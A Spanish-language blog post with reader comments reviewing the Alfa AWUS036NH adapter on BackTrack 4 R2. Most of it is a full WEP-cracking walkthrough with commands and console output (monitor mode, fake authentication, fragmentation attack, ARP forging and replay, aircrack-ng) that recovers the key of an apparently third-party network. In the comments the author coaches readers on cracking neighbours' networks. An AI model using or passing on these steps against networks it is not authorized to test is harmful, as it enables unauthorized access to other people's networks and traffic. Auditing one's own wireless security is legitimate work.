Alfa 2w Modo Monitor (AWUS036NH - rt2800usb)
El alfa 2000mw soporta modo monitor en BackTrack 4 r2 sin instalar nada de nada, automáticamente la reconoce con el driver rt2800usb. El alfa 2w me llego ayer mismo, lo primero que hice es averiguar si soportaba modo monitor y como podrán ver en este post, si que soporta. En cuanto a inyección es brutal!!, arriba de los 500 datas por segundo.
root@bt:~# airmon-ng
Interface Chipset Driver
wlan0 Ralink RT2870/3070 rt2800usb - [phy0]
root@bt:~#
Iniciamos airmon-ngroot@bt:~# airmon-ng start wlan0
Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
6179 dhclient
6179 dhclient
Interface Chipset Driver
wlan0 Ralink RT2870/3070 rt2800usb - [phy0]
(monitor mode enabled on mon0)
root@bt:~#
Ahora lo tenemos en modo monitor, listo para empezar auditar!!root@bt:~# iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wlan0 IEEE 802.11bgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=7 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
mon0 IEEE 802.11bgn Mode:Monitor Tx-Power=7 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Power Management:off
root@bt:~#
Iniciamos airodump-ng para mirar un objetivo. CH 6 ][ Elapsed: 4 s ][ 2011-02-26 13:16
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
5C:4C:A9:XX:XX:XX 33 3 0 0 11 54e WEP WEP GUSAB
5C:4C:A9:XX:XX:XX 33 4 0 0 1 54e WEP WEP INFINITUMcb9
00:18:3F:XX:XX:XX 6 5 0 0 6 54 . WEP WEP 2WIRE6743
BSSID STATION PWR Rate Lost Packets Probes
Una vez escogido el objetivo, lanzamos airodump-ng.root@bt:~# airodump-ng --bssid 00:18:3F:XX:XX:XX -c 6 -w captura mon0
Lanzado airodump-ng, ahora toca asociarnos con el objetivo.root@bt:~# aireplay-ng -e 2WIRE6743 -a 00:18:3F:XX:XX:XX -h 00:C0:CA:XX:XX:XX -1 0 mon0
13:19:11 Waiting for beacon frame (BSSID: 00:18:3F:XX:XX:XX) on channel 6
13:19:11 Sending Authentication Request (Open System) [ACK]
13:19:11 Authentication successful
13:19:11 Sending Association Request [ACK]
13:19:11 Association successful :-) (AID: 1)
Como puede ver, con el alfa 2w asocio a la primera y eso que el router estaba muy distante y con muchos obstáculos. Ahora solo lanzamos cualquier ataque con el areplay-ng, en mi caso lance el ataque de fragmentación (ataque 5).
root@bt:~# aireplay-ng -5 -b 00:18:3F:XX:XX:XX -h 00:C0:CA:XX:XX:XX mon0
13:19:20 Waiting for beacon frame (BSSID: 00:18:3F:XX:XX:XX) on channel 6
13:19:20 Waiting for a data packet...
Size: 68, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:18:3F:XX:XX:XX
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:18:3F:XX:XX:XX
0x0000: 0842 3a01 ffff ffff ffff 0018 3f18 85c9 .B:.........?...
0x0010: 0018 3f18 85c9 6076 c7c0 3f00 3130 92ea ..?...`v..?.10..
0x0020: f56f eb33 e447 71e0 3365 0e61 e8f1 dd2a .o.3.Gq.3e.a...*
0x0030: 1246 669b bf66 bd76 e9dd 234a b45d 9327 .Ff..f.v..#J.].'
0x0040: 4642 6ad2 FBj.
Use this packet ? y
Saving chosen packet in replay_src-0226-131920.cap
13:19:22 Data packet found!
13:19:22 Sending fragmented packet
13:19:22 Got RELAYED packet!!
13:19:22 Trying to get 384 bytes of a keystream
13:19:22 Got RELAYED packet!!
13:19:22 Trying to get 1500 bytes of a keystream
13:19:22 Got RELAYED packet!!
Saving keystream in fragment-0226-131922.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
root@bt:~#
Y como pueden ver es totalmente soportado y la inyeccion es brutal!!. Una vez generado el archivo PRGA (del ingles “pseudo random generation algorithm” o algoritmo de generación seudo aleatoria) con extención ".xor", usaremos packetforge-ng para crear un paquete arp. Nuestro objetivo es que el punto de acceso reenvie continuamente el paquete arp inyectado. Cuando lo reenvie obtendremos un nuevo IV (vector de inicialización). Todos estos IVs los usaremos para obtener la clave WEP.
root@bt:~# packetforge-ng -0 -a 00:18:3F:XX:XX:XX -h 00:C0:CA:XX:XX:XX -k 255.255.255.255 -l 255.255.255.255 -y fragment-0226-131922.xor -w ARP
Wrote packet to: ARP
Inyección del paquete ARP con areplay-ng.root@bt:~# aireplay-ng -2 -r ARP mon0
No source MAC (-h) specified. Using the device MAC (00:C0:CA:XX:XX:XX)
Size: 68, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:18:3F:XX:XX:XX
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:C0:CA:XX:XX:XX
0x0000: 0841 0201 0018 3f18 85c9 00c0 ca4a 8297 .A....?......J..
0x0010: ffff ffff ffff 8001 c7c0 4300 1018 b7e1 ..........C.....
0x0020: 6cde c857 5ad1 d077 a046 b99e 35b7 98fa l..WZ..w.F..5...
0x0030: 5f01 7c1c 5afb 7836 bc01 eaa3 f9f8 b69e _.|.Z.x6........
0x0040: 02ca b6ee ....
Use this packet ? y
Saving chosen packet in replay_src-0226-131938.cap
You should also start airodump-ng to capture replies.
En el anterior paso habrán bien los ojos! y miren como inyecta el alfa 2000mw. Por ultimo lanzamos aircrack-ng para obtener la clave WEP.root@bt:~# aircrack-ng captura-01.cap
Opening captura-01.cap
Read 106515 packets.
# BSSID ESSID Encryption
1 00:18:3F:XX:XX:XX 2WIRE6743 WEP (32632 IVs)
Choosing first network as target.
Opening captura-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 32822 ivs.
Aircrack-ng 1.1 r1738
[00:00:00] Tested 258 keys (got 32812 IVs)
KB depth byte(vote)
0 30/ 33 92(36096) 62(35840) 76(35840) 84(35840) BC(35840)
1 0/ 1 02(47616) 6A(41216) E8(40704) 03(40192) D3(40192)
2 0/ 4 95(44544) 9A(42496) 44(39936) 31(39680) 15(38912)
3 0/ 2 92(45568) F4(40704) 05(40448) 86(40448) 35(39424)
4 0/ 1 80(48896) 1E(40192) 7A(39936) 16(39424) 94(39424)
KEY FOUND! [ 76:02:95:92:80 ]
Decrypted correctly: 100%
root@bt:~#
Sin duda me sorprendi, ya que antes de comprar el alfa, donde quiera habia leido que no servia para auditoria, pero ya ven si que sirve. Ha sido mi mejor adquisicion, para mi es la mejor de todas, tengo otros tres dipositivos USB, el WifiSky, el Kasens G5000 y el dragon FL-2016G pero sin duda puedo decir que barre con las tres!
Saludos y ahora que me entreguen mi camara lestomare unas fotitos para compartirlo con todos y platicarles el precio y los detalles de esta nueva adquisición.
Saludos y ahora que me entreguen mi camara lestomare unas fotitos para compartirlo con todos y platicarles el precio y los detalles de esta nueva adquisición.
Update:
Por cierto ya estan las primeras imagenes de BackTrack 5 !!!
29 comentarios
HEY MEN RECHIDO TU TUTO SOY DE COLOMBIA Y QUIERO COMPRARME UNA DE ESTAS ME LA ACONSEJAS OK SALUDOS
ResponderEliminarANDRES
Sin duda que si, es un excelente dispositivo, te la recomiendo ampliamente. Saludos!.
ResponderEliminarhola..tengo un usb wifi de 2w marca wiflycity .. instalo backtrack 4 r2 en VmWare pero no me detecta mi usb wifi ..xq sera? me ayudas?
ResponderEliminar@sparko
ResponderEliminarSera porque no tendras activado el USB wifi para que lo detecte el VMware. Para hacer esto debes ir al Menu VM > Removable Devices > Tu tarjeta USB > Connect. Con esto es suficiente para que al inciar backtrack lo reconozca.
Si por alguna razon sigue sin detectar el dispositivo Wifi revisa que el servicio "VMware USB Arbitration Services" este inciadio. Para ver si esta iniciado debes ir al panel de control > Herramientas administrativas > Servicios.
hola otra vez ..pues si eso era ..jeje ..bueno ahora loq pasa esq tengo varias señales wifi con cifrado wep ..pero la mayoria tienen el nombre en 2 silabas ej:
ResponderEliminarroberto saldaña o sino cerrado con parentesis o separadas x guiones bajo ..q puedo hacer en estos casos ..yaq no se puedo generar trafico hay algun komando para este tipo de essid ?¿ gracias
@sparko
ResponderEliminarBuenas.
Para ese tipo de ESSID utiliza las comillas " "
Ejemplo:
ESSID = delfi rosales
"delfi rosales"
ok ..ultima ..dime xq a algunas señales no dejan generar trafico ..? el data sube muy lento .. q puedo hacer q inyeccion me rekomiendad ..?
ResponderEliminarNo hay problema, puedes preguntar las dudas que tu quieras,, si puedo ayudarte con mucho gusto lo are.
ResponderEliminarEn cuanto a los datas dependiendo del tipo que ataque que realices. También debes de saber si tu dispositivo USB soporta algunos ataques como el chopchop o el ataque de fragmentacion. Y creo que tu dispositivo (wiflycity) si soporta estos ataques ya que tiene un chipset rtl8187.
Si soporta te recomiendo estos últimos ataques. Primero prueba con el ataque chopchop, si no genera nada de trafico puedes probar con el ataque 5 (fragmento) y seguro que en un par de minutos tienes la clave.
Saludos.
hola... qtal ..mira yo tengo konocimientos basicos en el backtrack .. ahora uso el backtrack 4r2 ..en un makina virtual ..ahora kisiera saber si me puedes pasar un manual en pdf .. kon el chopchop o ataque 5 (fragmento) ..te agradeceria mucho amigo .. te dejo mi correo .. shaggy_1920@hotmail.com . salu2
ResponderEliminarBuenas.
ResponderEliminarEste mismo post muestra el ataque de fragmentacion.
Incluso hay un vÃdeo que publique en este post. http://delfirosales.blogspot.com/2011/02/video-auditoria-wifi-con-el-alfa-2000mw.html
En el video se muestra el ataque de Fragmentacion, puedes seguirlo paso a paso.
Para el ataque de Chopchop es el mismo proceso, solo cambia en el siguiente paso.
root@bt:~# aireplay-ng -5 -b 00:18:3F:XX:XX:XX -h 00:C0:CA:XX:XX:XX mon0
En lugar de -5 es -4 para el chopchop.
Saludos.
ok .. en los tutos q veo en la mayoria veo q al escribir komandos al final termina con mon0 .. y xq no wlan0 ?¿
ResponderEliminarBueno eso es porque al poner mi tarjeta en modo monitor con el airmon-ng me genera el mon0 (en ingles significa modo monitor).
ResponderEliminarEsto dependiendo de la tarjeta que tengas, en algunos solo te lo deja en Wlan0 en algunos genera el mon0 dependiendo como te lo indique en la consola.
Por ejemplo a la hora de poner la tarjeta en modo monitor con el comando airmon-ng start wlan0 te mostrara algo similar a esto.
#airmon-ng start wlan0
(monitor mode enabled on mon0)
En este ejemplo wlan0 queda en modo managed y mon0 como lo indica la consola queda en modo monitor.
Y para escuchar todo el trafico wireless la tarjeta debe estar en modo monitor.
Este comentario ha sido eliminado por el autor.
ResponderEliminarhola .como estas..pues lamentablemente ..no pude sacar la kontrase̱a a un se̱al ..no se asocia no sale autenticacion sucefull :) ..algo asi ..se keda saliendo autenticacion ---..etc etc .... pero ai se keda ...y nada :( .. puse las komillas komo me dijiste pero nada ..el essid es "roberto wifi" xq sera ..?ResponderEliminarHola sparko.
ResponderEliminarEl que no pueda asociarse al AP puede ser por varias razones. Ojala puedas poner aquà el resultado que te da en consola para poder ayudarte.
hola delfi tengo una buena pregunta, tengo todo un dia queriendo deslaquear mi antena y no he podido no me puede fragmentar (saving keystream in fragment)y no puedo seguir mas adelante , si lee la antena y me da todo ,pero no me puede fragmentar, me da un error que el interface MAC no machea te agradeceria si me puedes ayudar y tambien te encargo si puedes hacer un titurial para bajar y copiar el back track 4 r2
ResponderEliminargracias quidate
Buenas dj carlangas.
ResponderEliminarCuando te refieres a que no pasas de "saving keystream in fragment" es cuando el ataque de fragmentacion a funcionado correctamente??
Algo asÃ:
13:19:22 Data packet found!
13:19:22 Sending fragmented packet
13:19:22 Got RELAYED packet!!
13:19:22 Trying to get 384 bytes of a keystream
13:19:22 Got RELAYED packet!!
13:19:22 Trying to get 1500 bytes of a keystream
13:19:22 Got RELAYED packet!!
Saving keystream in fragment-0226-131922.xor
Si es parecido lo que te muestra en consola, significa que puedes seguir adelante ya que se ha generado correctamente el archivo PRGA con extencion ".xor" este archivo se necesita para seguir con el siguiente paso que es
utilizar packetforge-ng para crear un paquete arp y asà poder realizar la inyección de trafico con el areplay-ng.
o que error te muestra?
Lo de copiar backtrack te refieres a copiarlo en un CD/DVD ?
Saludos.
buenas delfi
ResponderEliminargracias por contestarme lo que quiero decirte es que no paso del paso #5 donde de esta fragmentando y solo se esta leyendo los (packets) y no me da (Saving keystream in fragment-0226-131922.xor) para poder seguir o le estoy poniendo mal las clave o el back track r2 no sirve, no se que hacer tengo 2 dias trabajando en esto y no me da por favor ayudame.
gracias
hola yo acabo de comprar mi alfa 2000mw, tengo 2 preguntas, de donde saco -h ??? no encuentro mi mac y no agarra la fake.. y veo que tu antena te marca 7 dBm , la mia 6 dBm, mire un tutorial en youtube para subirla hasta 30 dBm pero no funciona.\\gracias//
ResponderEliminarhola delfi, a mi m pasa igual k djcarlangas me sale Read ... packets y de ahi no me pasa. Gracias espero tu respuesta
ResponderEliminardelfi soy dj carlangas tengo mas de un mes y medio que no meas contestado la pregunta a sercas del alfa 2000 o es puro cuento todo es lo tuyo
ResponderEliminar@djcarlangas
ResponderEliminarPuede ser por varias razones, puede que el punto de acceso no sea vulnerable a este ataque, por eso hay alternativas como el chopchop http://delfirosales.blogspot.com/2011/06/ataque-4-ataque-chopchop-attack-2.html
@Anónimo
ResponderEliminarel -h se refiere a que tienes que especificar la direccion MAC de tu tarjeta y para esto solo teclea en consola el comando "ifconfig" y te mostrara las tarjetas con su respectiva direccion MAC.
Lo de subir los dBm no sabria decirte como hacerlo, ya que no lo he intentado.
saludos!
@djcarlangas
ResponderEliminarNo te molestes, ya te he contestado, puede ser por varias razon, que no lo estas aciendo bien, que el punto de acceso este muy lejos y que no llegue muy bien la señal, que el punto de acceso no sea vulnerable y otras razones, pero puedes probar con otros tipos de ataques y seguro que obtines la clave.
Y como te lo mencione no te molestes, te vallas enfermar, elige la paz, aveces no tengo tiempo para contestar. Pero tarde o temprano es seguro :)
Saludos!
@Anónimo
ResponderEliminarComo le mencione a djcarlangas, es que puede ser por varias razon, puede que no lo estas aciendo bien, que el punto de acceso este muy lejos y que no llegue muy bien la señal, que el punto de acceso no sea vulnerable y otras razones, pero puedes probar con otros tipos de ataques como el chopchop http://delfirosales.blogspot.com/2011/06/ataque-4-ataque-chopchop-attack-2.html
Desasociando a un cliente conectado al punto de acceso y asi obtener la clave http://delfirosales.blogspot.com/2011/04/video-cracking-wep-desasociando-un.html
o utilizando el Ataque 1: Autenticación Falsa + el
Ataque 3: Reinyección de una petición ARP (ARP-request) http://delfirosales.blogspot.com/2011/03/video-inyeccion-con-alfa-2000mw-en.html
y seguro que obtines la clave :)
saludos!!
TENGO UN PROBLEMA, utilizo el mismo alfa que tu:
ResponderEliminarInterface Chipset Driver
wlan0 Ralink RT2870/3070 rt2800usb - [phy0]
pero cuando ejecuto el comando airdump-ng me sale el siguiente error:
ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211.
alguna idea?
mui buenas delfin sabes por que cuando Inicio airmon-ng
ResponderEliminarno me funciona tengo un usb con el chips realik 3070 te agradeceria muncho que me alludaras gracias i un saludo dede murcia dejo mi correo por si me quereis ayudar solitario.soy@hotmail.com
quisiera saber si puedes deslaquear en el sistema WAP2 si puedes hechamela la mano
ResponderEliminargracias
wewAyuda tengo un portátil HP pavilion DM4 y tiene una tarjeta de red incorporada marca Intel(R)Wifi link 1000 BGN y no la detecta los siguientes sistemas operativos para auditoria wireless wifiway/wifislax y Backtrack 5
ResponderEliminar... no se detecta ninguna red en modo wlan0 ni mon0